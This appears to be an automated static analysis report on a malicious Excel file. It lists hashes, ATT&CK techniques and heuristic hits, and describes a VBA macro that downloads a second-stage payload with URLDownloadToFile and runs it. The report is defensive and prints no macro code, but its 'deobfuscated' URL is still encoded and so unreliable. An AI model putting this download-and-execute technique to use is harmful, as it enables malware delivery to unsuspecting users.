Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 a6fdd0629ed927d7…

MALICIOUS

Office (OLE) / .XLS

67.0 KB Created: 2022-06-29 08:40:51 First seen: 2022-06-29
MD5: 18625572bfa5c43e880823c53bed502c SHA-1: 42ee8411f3cf94942818be6a54ec5ebc03d08979 SHA-256: a6fdd0629ed927d7b38a7309bcfcadd08e6a7368b3f18ca49a7d40c755193312
188 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer

The VBA macro explicitly uses the URLDownloadToFile API to download a file from a deobfuscated URL. The script then attempts to execute this downloaded file, likely a second-stage payload. The deobfuscated URL is "http://137.123.128.127.134.133.76.76.76.123.128.136.119.133.134.130.132.123.118.119.133.64.117.129.127". The downloaded file is saved to the temporary directory with a random name.

Heuristics 5

  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
8012cacf36a788912ce9a7cb8034561aba0a18cc8d734dd5088e8c199b7c48ff		 vba-macro oletools.olevba.extract_macros (decoded VBA source) 2200 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.